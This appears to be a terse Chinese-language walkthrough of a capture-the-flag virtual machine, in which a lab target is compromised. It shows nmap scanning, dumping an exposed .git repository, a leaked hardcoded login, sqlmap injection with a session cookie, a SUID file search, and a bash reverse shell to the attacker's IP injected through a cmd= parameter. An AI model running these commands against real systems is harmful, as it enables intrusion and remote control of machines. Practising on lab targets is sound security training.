描述
Difficulty:Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
nmap扫存活

1 2
| kali 192.168.169.220 靶机 192.168.169.230
|
nmap扫描靶机

1 2
| 端口 22 80 Git repository git泄露
|
目录


使用git工具
1
| https://github.com/arthaud/git-dumper
|

1
| python3 git_dumper.py http://192.168.169.230/.git/ website
|

查看文件



git log



1
| if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
|
登陆测试


注入

1
| sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie PHPSESSID=3ca3jbi4mk3749bv84uu4supol --dbs
|




ssh
1
| ssh jehad@192.168.169.230
|



1
| find / -user root -perm -4000 -print 2>/dev/null
|




写入shell
1
| bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
|
1
| bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
|
1
| curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"
|




切换用户


提权


